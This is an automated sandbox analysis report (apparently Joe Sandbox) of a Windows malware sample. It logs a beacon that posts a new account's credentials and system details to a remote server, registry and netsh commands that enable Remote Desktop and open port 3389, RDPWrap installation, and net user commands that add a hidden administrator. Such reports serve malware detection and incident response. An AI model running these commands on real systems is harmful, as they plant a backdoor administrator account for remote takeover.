                                                                                                                                Content-Length: 186
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-10-03 13:07:47 UTC25INHTTP/1.1 100 Continue
                                                                                                                                2024-10-03 13:07:47 UTC186OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 75 73 65 72 3d 42 6f 79 64 4b 72 61 6a 63 69 6b 26 70 61 73 73 77 6f 72 64 3d 68 44 4e 51 68 66 6a 4b 4d 39 53 30 26 6f 73 5f 6e 61 6d 65 3d 57 69 6e 64 6f 77 73 2b 31 30 2b 50 72 6f 26 70 72 6f 63 65 73 73 6f 72 3d 49 6e 74 65 6c 28 52 29 2b 43 6f 72 65 28 54 4d 29 32 2b 43 50 55 2b 36 36 30 30 2b 25 34 30 2b 32 2e 34 30 2b 47 48 7a 26 63 6f 72 65 73 3d 34 26 67 70 75 3d 4e 57 48 4e 36 59 26 67 70 75 5f 6d 65 6d 6f 72 79 3d 31 30 32 34 26 72 61 6d 3d 34 30 39 35 26 64 69 73 6b 5f 73 70 61 63 65 3d 33 38 33
                                                                                                                                Data Ascii: ip=8.46.123.33&user=BoydKrajcik&password=hDNQhfjKM9S0&os_name=Windows+10+Pro&processor=Intel(R)+Core(TM)2+CPU+6600+%40+2.40+GHz&cores=4&gpu=NWHN6Y&gpu_memory=1024&ram=4095&disk_space=383
                                                                                                                                2024-10-03 13:07:47 UTC599INHTTP/1.1 200 OK
                                                                                                                                Date: Thu, 03 Oct 2024 13:07:47 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                Vary: Accept-Encoding
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kZk7cyT4V3aBHsugbrWVJYdOywenZ6b1SwUK062dt8u49KP0ylWqukuWFt7N%2BZZBbkAEP6kw4e2hy3zd4xj1PYrdIBY5G6yNRFD8eq8EkOe%2BUhfNLnWv9yt8XxmMYVs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8ccd283d8fec431f-EWR
                                                                                                                                0


                                                                                                                                Click to jump to process

                                                                                                                                Click to jump to process

                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                Click to jump to process

                                                                                                                                Target ID:0
                                                                                                                                Start time:09:07:00
                                                                                                                                Start date:03/10/2024
                                                                                                                                Path:C:\Users\user\Desktop\file.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                Imagebase:0xc60000
                                                                                                                                File size:2'066'432 bytes
                                                                                                                                MD5 hash:EA2954E7FC00520A5300E72EDEA11B0F
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2499189931.0000000000C62000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2500984157.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000000.2026603249.0000000000D4A000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                Target ID:2
                                                                                                                                Start time:09:07:07
                                                                                                                                Start date:03/10/2024
                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "AllowRemoteRPC" /t REG_DWORD /d 1 /f
                                                                                                                                Imagebase:0x790000
                                                                                                                                File size:236'544 bytes
                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:3
                                                                                                                                Start time:09:07:07
                                                                                                                                Start date:03/10/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:4
                                                                                                                                Start time:09:07:07
                                                                                                                                Start date:03/10/2024
                                                                                                                                Path:C:\Windows\SysWOW64\reg.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "AllowRemoteRPC" /t REG_DWORD /d 1 /f
                                                                                                                                Imagebase:0x390000
                                                                                                                                File size:59'392 bytes
                                                                                                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:5
                                                                                                                                Start time:09:07:07
                                                                                                                                Start date:03/10/2024
                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRemoteDesktop" /t REG_DWORD /d 0 /f
                                                                                                                                Imagebase:0x790000
                                                                                                                                File size:236'544 bytes
                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:6
                                                                                                                                Start time:09:07:07
                                                                                                                                Start date:03/10/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:7
                                                                                                                                Start time:09:07:07
                                                                                                                                Start date:03/10/2024
                                                                                                                                Path:C:\Windows\SysWOW64\reg.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRemoteDesktop" /t REG_DWORD /d 0 /f
                                                                                                                                Imagebase:0x390000
                                                                                                                                File size:59'392 bytes
                                                                                                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:8
                                                                                                                                Start time:09:07:07
                                                                                                                                Start date:03/10/2024
                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
                                                                                                                                Imagebase:0x790000
                                                                                                                                File size:236'544 bytes
                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:9
                                                                                                                                Start time:09:07:07
                                                                                                                                Start date:03/10/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:10
                                                                                                                                Start time:09:07:07
                                                                                                                                Start date:03/10/2024
                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\RDPWInst.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
                                                                                                                                Imagebase:0x400000
                                                                                                                                File size:1'785'344 bytes
                                                                                                                                MD5 hash:C213162C86BB943BCDF91B3DF381D2F6
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000A.00000000.2104981738.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: 0000000A.00000000.2105035619.0000000000450000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
                                                                                                                                Antivirus matches:
                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                • Detection: 68%, ReversingLabs
                                                                                                                                Reputation:moderate
                                                                                                                                Has exited:true

                                                                                                                                Target ID:13
                                                                                                                                Start time:09:07:10
                                                                                                                                Start date:03/10/2024
                                                                                                                                Path:C:\Windows\System32\netsh.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                                                                                                                Imagebase:0x7ff6cabf0000
                                                                                                                                File size:96'768 bytes
                                                                                                                                MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:moderate
                                                                                                                                Has exited:true

                                                                                                                                Target ID:14
                                                                                                                                Start time:09:07:10
                                                                                                                                Start date:03/10/2024
                                                                                                                                Path:C:\Windows\System32\drivers\rdpvideominiport.sys
                                                                                                                                Wow64 process (32bit):
                                                                                                                                Commandline:
                                                                                                                                Imagebase:
                                                                                                                                File size:32'600 bytes
                                                                                                                                MD5 hash:77FF15B9237D62A5CBC6C80E5B20A492
                                                                                                                                Has elevated privileges:
                                                                                                                                Has administrator privileges:
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:moderate
                                                                                                                                Has exited:false

                                                                                                                                Target ID:15
                                                                                                                                Start time:09:07:10
                                                                                                                                Start date:03/10/2024
                                                                                                                                Path:C:\Windows\System32\drivers\rdpdr.sys
                                                                                                                                Wow64 process (32bit):
                                                                                                                                Commandline:
                                                                                                                                Imagebase:
                                                                                                                                File size:169'984 bytes
                                                                                                                                MD5 hash:64991B36F0BD38026F7589572C98E3D6
                                                                                                                                Has elevated privileges:
                                                                                                                                Has administrator privileges:
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:moderate
                                                                                                                                Has exited:false

                                                                                                                                Target ID:17
                                                                                                                                Start time:09:07:10
                                                                                                                                Start date:03/10/2024
                                                                                                                                Path:C:\Windows\System32\drivers\tsusbhub.sys
                                                                                                                                Wow64 process (32bit):
                                                                                                                                Commandline:
                                                                                                                                Imagebase:
                                                                                                                                File size:137'728 bytes
                                                                                                                                MD5 hash:CC6D4A26254EB72C93AC848ECFCFB4AF
                                                                                                                                Has elevated privileges:
                                                                                                                                Has administrator privileges:
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Target ID:21
                                                                                                                                Start time:09:07:41
                                                                                                                                Start date:03/10/2024
                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"cmd.exe" /c net user BoydKrajcik hDNQhfjKM9S0 /add
                                                                                                                                Imagebase:0x790000
                                                                                                                                File size:236'544 bytes
                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:22
                                                                                                                                Start time:09:07:41
                                                                                                                                Start date:03/10/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:23
                                                                                                                                Start time:09:07:41
                                                                                                                                Start date:03/10/2024
                                                                                                                                Path:C:\Windows\SysWOW64\net.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:net user BoydKrajcik hDNQhfjKM9S0 /add
                                                                                                                                Imagebase:0x310000
                                                                                                                                File size:47'104 bytes
                                                                                                                                MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:24
                                                                                                                                Start time:09:07:41
                                                                                                                                Start date:03/10/2024
                                                                                                                                Path:C:\Windows\SysWOW64\net1.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\system32\net1 user BoydKrajcik hDNQhfjKM9S0 /add
                                                                                                                                Imagebase:0xcb0000
                                                                                                                                File size:139'776 bytes
                                                                                                                                MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:25
                                                                                                                                Start time:09:07:41
                                                                                                                                Start date:03/10/2024
                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"cmd.exe" /c net localgroup
                                                                                                                                Imagebase:0x790000
                                                                                                                                File size:236'544 bytes
                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:26
                                                                                                                                Start time:09:07:41
                                                                                                                                Start date:03/10/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:27
                                                                                                                                Start time:09:07:41
                                                                                                                                Start date:03/10/2024
                                                                                                                                Path:C:\Windows\SysWOW64\net.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:net localgroup
                                                                                                                                Imagebase:0x310000
                                                                                                                                File size:47'104 bytes
                                                                                                                                MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:28
                                                                                                                                Start time:09:07:41
                                                                                                                                Start date:03/10/2024
                                                                                                                                Path:C:\Windows\SysWOW64\net1.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\system32\net1 localgroup
                                                                                                                                Imagebase:0xcb0000
                                                                                                                                File size:139'776 bytes
                                                                                                                                MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:29
                                                                                                                                Start time:09:07:41
                                                                                                                                Start date:03/10/2024
                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"cmd.exe" /c net localgroup "Remote Desktop Users" BoydKrajcik /add
                                                                                                                                Imagebase:0x790000
                                                                                                                                File size:236'544 bytes
                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:30
                                                                                                                                Start time:09:07:41
                                                                                                                                Start date:03/10/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:31
                                                                                                                                Start time:09:07:41
                                                                                                                                Start date:03/10/2024
                                                                                                                                Path:C:\Windows\SysWOW64\net.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:net localgroup "Remote Desktop Users" BoydKrajcik /add
                                                                                                                                Imagebase:0x310000
                                                                                                                                File size:47'104 bytes
                                                                                                                                MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:32
                                                                                                                                Start time:09:07:41
                                                                                                                                Start date:03/10/2024
                                                                                                                                Path:C:\Windows\SysWOW64\net1.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\system32\net1 localgroup "Remote Desktop Users" BoydKrajcik /add
                                                                                                                                Imagebase:0xcb0000
                                                                                                                                File size:139'776 bytes
                                                                                                                                MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:33
                                                                                                                                Start time:09:07:42
                                                                                                                                Start date:03/10/2024
                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"cmd.exe" /c netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
                                                                                                                                Imagebase:0x790000
                                                                                                                                File size:236'544 bytes
                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:34
                                                                                                                                Start time:09:07:42
                                                                                                                                Start date:03/10/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:35
                                                                                                                                Start time:09:07:42
                                                                                                                                Start date:03/10/2024
                                                                                                                                Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
                                                                                                                                Imagebase:0x1080000
                                                                                                                                File size:82'432 bytes
                                                                                                                                MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:36
                                                                                                                                Start time:09:07:42
                                                                                                                                Start date:03/10/2024
                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"cmd.exe" /c net localgroup "Administrators" BoydKrajcik /add
                                                                                                                                Imagebase:0x790000
                                                                                                                                File size:236'544 bytes
                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:37
                                                                                                                                Start time:09:07:42
                                                                                                                                Start date:03/10/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:38
                                                                                                                                Start time:09:07:42
                                                                                                                                Start date:03/10/2024
                                                                                                                                Path:C:\Windows\SysWOW64\net.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:net localgroup "Administrators" BoydKrajcik /add
                                                                                                                                Imagebase:0x310000
                                                                                                                                File size:47'104 bytes
                                                                                                                                MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:39
                                                                                                                                Start time:09:07:42
                                                                                                                                Start date:03/10/2024
                                                                                                                                Path:C:\Windows\SysWOW64\net1.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\system32\net1 localgroup "Administrators" BoydKrajcik /add
                                                                                                                                Imagebase:0xcb0000
                                                                                                                                File size:139'776 bytes
                                                                                                                                MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Reset < >

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:17.8%
                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                  Signature Coverage:100%
                                                                                                                                  Total number of Nodes:6
                                                                                                                                  Total number of Limit Nodes:0
                                                                                                                                  execution_graph 19447 5766080 19448 57660cb NtAllocateVirtualMemory 19447->19448 19450 5766112 19448->19450 19443 5765fa8 19444 5765ff6 NtProtectVirtualMemory 19443->19444 19446 5766040 19444->19446
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2500228720.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1590000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: K0b$%<l$)>o$0=2q$2K$4T++$> 2$elapaz
                                                                                                                                  • API String ID: 0-652127122
                                                                                                                                  • Opcode ID: 976b3553de79ebef218927b06e694989cb0984f203af96764b5ac6c5e24ba7da
                                                                                                                                  • Instruction ID: 4890badf4f90526a5da66c96dbb21a45c1caa9d91a29ace1876babb7d94c071d
                                                                                                                                  • Opcode Fuzzy Hash: 976b3553de79ebef218927b06e694989cb0984f203af96764b5ac6c5e24ba7da
                                                                                                                                  • Instruction Fuzzy Hash: 2AE33E76F1023A8FCB64DF68C840A9DB7F6BB89210F5149A9D809FB350DA35AD41CF91
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2500228720.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1590000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: K0b$%<l$)>o$0=2q$2K$4T++$> 2$elapaz
                                                                                                                                  • API String ID: 0-652127122
                                                                                                                                  • Opcode ID: 9e48a8ba2223165a49d92174047c877e20bdab4e71834d30091801b509e72800
                                                                                                                                  • Instruction ID: 02ec7efeed4678772363894ca242ecebafa944bb8bf28dc6bb3105ac14a7f0e3
                                                                                                                                  • Opcode Fuzzy Hash: 9e48a8ba2223165a49d92174047c877e20bdab4e71834d30091801b509e72800
                                                                                                                                  • Instruction Fuzzy Hash: E9E32E76F1023A8FCB64DF68C840A9DB3F6BB89210F5149A9D819FB350DA35AD41CF91
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2503709736.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5760000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (o]q$3`"$5n2@$Haq$paq$paq
                                                                                                                                  • API String ID: 0-2055711424
                                                                                                                                  • Opcode ID: 32c08f428c544bf50313b96312a45a8b2f6c3c611f41c56d132bbdc2d5facfc1
                                                                                                                                  • Instruction ID: dbce9e156de8e73b41761598cfe88b45922eaed7964b31a1153e0cdce5ae265e
                                                                                                                                  • Opcode Fuzzy Hash: 32c08f428c544bf50313b96312a45a8b2f6c3c611f41c56d132bbdc2d5facfc1
                                                                                                                                  • Instruction Fuzzy Hash: C4031C75E04219CFEB64CFB8C888A9DBBB2BF49310F65419DD509AB262DB349D81DF40

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 2280 1598ec0-1598ecd 2281 1598ecf-1598ef1 2280->2281 2282 1598f23-1598f3d 2280->2282 2285 1598ef4-1598ef7 2281->2285 2283 1598f08-1598f22 2282->2283 2284 1598f3f-1598fc7 2282->2284 2283->2282 2284->2285 2286 1598fcd-1599013 2284->2286 2288 1598f00-1598f03 2285->2288 2286->2283 2287 1599019-1599028 2286->2287 2288->2283
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2500228720.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1590000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: >v!8$?04
                                                                                                                                  • API String ID: 0-995226417
